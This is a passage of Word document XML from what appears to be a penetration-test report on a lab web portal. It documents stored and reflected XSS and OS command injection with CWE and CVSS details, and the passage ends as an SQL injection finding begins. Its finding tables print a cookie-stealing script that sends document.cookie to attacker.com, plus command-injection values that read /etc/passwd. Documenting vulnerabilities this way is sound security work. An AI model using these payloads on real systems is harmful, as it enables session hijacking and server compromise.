      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="671ADC36" w14:textId="77777777" w:rsidTr="009B73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2B57687" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6691168C" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation (Stored)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="7EB3FAD8" w14:textId="77777777" w:rsidTr="009B73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C7EFE47" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EEDAA87" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="2136A91B" w14:textId="77777777" w:rsidTr="009B73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9AB2FC5" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="175489C9" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>Attacker stores a malicious script on the server that executes automatically in the browser of every user who visits the feedback page — enabling mass session hijacking or cookie theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w:rsidRPr="009B73CB" w14:paraId="7B5408BA" w14:textId="77777777" w:rsidTr="009B73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902366B" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Trigger Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EE76E4" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B73CB">
              <w:t>document.location</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B73CB">
              <w:t>='http://attacker.com/?c='+document.cookie&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B73CB" w14:paraId="188FB1B6" w14:textId="77777777" w:rsidTr="009B73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1DFCA2B" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRPr="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1A1A">
            <w:r w:rsidRPr="009B73CB">
              <w:t>Evidence URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615BC489" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="008B1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73CB">
              <w:t>POST /feedback then visit http://192.168.100.205:5000/feedback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E1438B6" w14:textId="1A378FBE" w:rsidR="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="009B73CB"/>
    <w:p w14:paraId="2DC096F7" w14:textId="38BFD009" w:rsidR="002B7B52" w:rsidRDefault="00AD6B80" w:rsidP="002B7B52">
      <w:r>
        <w:t>Testing XSS in /search:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C6B310" w14:textId="146BB7D0" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00AD6B80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD6B80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03775EC3" wp14:editId="43261E24">
            <wp:extent cx="5586825" cy="1159147"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13299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47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95175" cy="116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BCA7" w14:textId="33699604" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00AD6B80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD6B80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74ACF795" wp14:editId="2AA3110E">
            <wp:extent cx="3452159" cy="1204064"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42102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249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A66A" w14:textId="77777777" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00AD6B80"/>
    <w:p w14:paraId="6731B32F" w14:textId="2109CA1C" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00AD6B80">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CFD7E" w14:textId="4018DBE6" w:rsidR="00AD6B80" w:rsidRDefault="00AD6B80" w:rsidP="00AD6B80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD6B80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B8DB14" wp14:editId="0D88889C">
            <wp:extent cx="3474480" cy="3049450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="167804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438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79574" cy="30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C9375" w14:textId="5692DC67" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r>
        <w:t>appears unescaped in 3 places inside the HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C98D74" w14:textId="4F45E3B2" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r>
        <w:t>Place 1 - Inside the input field value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4440FA" w14:textId="77777777" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="q" value="&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/script&gt;" ...&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AF40D" w14:textId="37E8D352" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r>
        <w:t>Place 2 - Inside the search results heading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0341645A" w14:textId="77777777" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;strong style="color: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--text-main);"&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/script&gt;&lt;/strong&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515B6E5" w14:textId="65A88D2D" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r>
        <w:t>Place 3 - Inside the alert message text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA8003" w14:textId="7D162B95" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="003179E7">
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>No archived internal documentation matched your search query "&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351162E0" w14:textId="6763B2DE" w:rsidR="00AD6B80" w:rsidRDefault="003179E7" w:rsidP="00AD6B80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D1E076" wp14:editId="62E0E888">
            <wp:extent cx="4217705" cy="2875339"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="134078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806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18731" cy="287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9A18" w14:textId="32D48EBA" w:rsidR="003179E7" w:rsidRDefault="003179E7" w:rsidP="00AD6B80">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003179E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7444B2" wp14:editId="6EAAB101">
            <wp:extent cx="4350007" cy="2374379"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="45760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025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52857" cy="23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1A68" w14:textId="100D9B65" w:rsidR="005E6F1E" w:rsidRPr="00E9458D" w:rsidRDefault="005E6F1E" w:rsidP="005E6F1E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9458D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stored XSS - /feedback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6234073B" w14:textId="63665A93" w:rsidR="005E6F1E" w:rsidRDefault="005E6F1E" w:rsidP="005E6F1E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005E6F1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68ADACB7" wp14:editId="0EA5C326">
            <wp:extent cx="4274531" cy="2505350"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="190469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9535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99171" cy="251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323F" w14:textId="77777777" w:rsidR="00E9458D" w:rsidRDefault="00E9458D" w:rsidP="00E9458D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1E97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13804156" wp14:editId="5EEEEFB0">
            <wp:extent cx="4384587" cy="1902798"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="43243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096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9736" cy="190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8FD9" w14:textId="77777777" w:rsidR="00E9458D" w:rsidRDefault="00E9458D" w:rsidP="00E9458D">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>redirect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the user to this page each time he tries to open /feedback page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2666E" w14:textId="77777777" w:rsidR="00E9458D" w:rsidRDefault="00E9458D" w:rsidP="00E9458D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1E97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBDFC20" wp14:editId="767E3954">
            <wp:extent cx="4382814" cy="1953068"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="137511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851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9002" cy="195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75FE" w14:textId="77777777" w:rsidR="00E9458D" w:rsidRDefault="00E9458D" w:rsidP="005E6F1E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8B914B" w14:textId="77777777" w:rsidR="005E6F1E" w:rsidRDefault="005E6F1E" w:rsidP="005E6F1E"/>
    <w:p w14:paraId="31E49A42" w14:textId="25ED748D" w:rsidR="005E6F1E" w:rsidRPr="00724BA4" w:rsidRDefault="005E6F1E" w:rsidP="005E6F1E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3.3 Vulnerability 3 - OS Command Injection (Critical)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24BA4" w:rsidRPr="00724BA4" w14:paraId="1FDC641A" w14:textId="77777777" w:rsidTr="00724B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3D885E9" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:lastRenderedPageBreak/>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54962A2A" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F942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24BA4">
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="47B53EFA" w14:textId="77777777" w:rsidTr="00724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4F900ED" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA568E0" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>POST /admin/tools — Server Network Diagnostics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="1CDC6383" w14:textId="77777777" w:rsidTr="00724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F3DE25A" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54214EE4" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>host (form-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="516E90DE" w14:textId="77777777" w:rsidTr="00724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DE25488" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED1CB3B" w14:textId="053C2E05" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="7DF738F3" w14:textId="77777777" w:rsidTr="00724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9B866FF" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52541004" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>CWE-78: Improper Neutralization of Special Elements used in an OS Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="2C41E816" w14:textId="77777777" w:rsidTr="00724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050B7C5" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03A6ACDA" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="406CF541" w14:textId="77777777" w:rsidTr="00724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7715301" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518A4459" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>Attacker executes arbitrary OS commands on the server with the web app's user privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="3ACB7EB1" w14:textId="77777777" w:rsidTr="00724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F09A02C" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Trigger Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F527E7F" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9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4BA4">
              <w:t>127.0.0.1; id or 127.0.0.1; cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00724BA4">
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00724BA4">
              <w:t>/passwd or 127.0.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00724BA4">
              <w:t>0.1 &amp;&amp;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00724BA4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00724BA4">
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724BA4" w:rsidRPr="00724BA4" w14:paraId="293033C3" w14:textId="77777777" w:rsidTr="00724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BC81AC1" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F9425C">
            <w:r w:rsidRPr="00724BA4">
              <w:t>Evidence URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B71869" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRPr="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00F94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4BA4">
              <w:t>POST /admin/tools with body host=127.0.0.1; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41086DF2" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4"/>
    <w:p w14:paraId="603AE93C" w14:textId="150855C6" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:r w:rsidRPr="00724BA4">
        <w:t>Description: /admin/tools passes the host field directly to ping shell command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58626D67" w14:textId="694D6F35" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:r w:rsidRPr="00724BA4">
        <w:t>Change host=127.0.0.1 → host=127.0.0.1; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD22305" w14:textId="252CC182" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC34F20" wp14:editId="7BD0BF6D">
            <wp:extent cx="4022559" cy="3585922"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36315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525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32229" cy="359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48B3FF3" w14:textId="3C75DCDB" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A69707" wp14:editId="06F829CC">
            <wp:extent cx="5153013" cy="2859482"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92632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2535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70657" cy="286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B26F" w14:textId="77777777" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4"/>
    <w:p w14:paraId="3642198F" w14:textId="4242A7EF" w:rsidR="00724BA4" w:rsidRPr="00576EE0" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3.4 Vulnerability 4 - SQL Injection (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DB4E7" w14:textId="7F3117F7" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="007D22CA">
      <w:r>
        <w:tab/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670CF" w:rsidRPr="007D22CA" w14:paraId="3C856E8E" w14:textId="77777777" w:rsidTr="007D22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6D26829" w14:textId="10C84E26" w:rsidR="00D670CF" w:rsidRPr="007D22CA" w:rsidRDefault="00D670CF" w:rsidP="00D9216D">
            <w:r>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F2C53C" w14:textId="5D706C1E" w:rsidR="00D670CF" w:rsidRPr="007D22CA" w:rsidRDefault="00D670CF" w:rsidP="00D921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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="575738CF" w14:textId="77777777" w:rsidTr="007D2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E511DBF" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08EF1722" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>POST /login — Portal Authentication Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="297DCE68" w14:textId="77777777" w:rsidTr="007D2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82B45A6" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F1BD316" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>username, password (form-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="027A3806" w14:textId="77777777" w:rsidTr="007D2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A643655" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518550D1" w14:textId="1D212316" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="2EE5F34B" w14:textId="77777777" w:rsidTr="007D2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5C3E658" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67687F3B" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
